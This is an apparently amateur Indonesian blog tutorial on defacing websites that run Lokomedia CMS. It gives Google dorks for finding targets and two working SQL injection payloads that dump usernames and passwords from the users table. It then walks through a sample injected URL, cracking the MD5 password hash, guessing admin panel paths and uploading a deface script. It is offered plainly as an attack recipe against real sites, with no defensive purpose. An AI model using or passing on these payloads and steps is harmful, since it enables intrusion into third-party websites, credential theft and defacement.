cara deface sqil lokomedia
hello bos kembali lagi ma gua pendekar hitam
jgn coly mulu ya bos inget umur wkwkwkw dah lah langsung aja
pd kesempatan kali ini gua mau bagiin Tutorial SQL Injection on Lokomedia CMS .
langsung aja nyimik ya wkwkw
Dork : - inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
kembangin lagi tuh dork bos biar bisa dapet yg unch
eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
atau ini juga bisa : 'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ tinggal pilih aja ya bos yg lo mau
1. tulis dork di google
2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.asw/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
Sekarang sudah kelihatan user sama passwordnya di bagian title.
kemudian ctrl+u untuk melihatnya lebih jelas.
Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalean bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.
Untuk login biasanya di :
- www.target.asw/admin
- www.target.asw/adminweb
- www.target.asw/administrator
- www.target.asw/redaktur
klo yg diatas gx bisa lo bisa pake apk admin panel finder banyak di google
Kali ini loginnya berada di target.c0li/adminweb/
, Kemudian masukan user dan pass nya trus tinggal upload aja sc lo di situ
done
bila ada kesalahan mohon maaf ya bos maklum gua juga masih noob
semoga bermanfaat ya thx
Komentar
Posting Komentar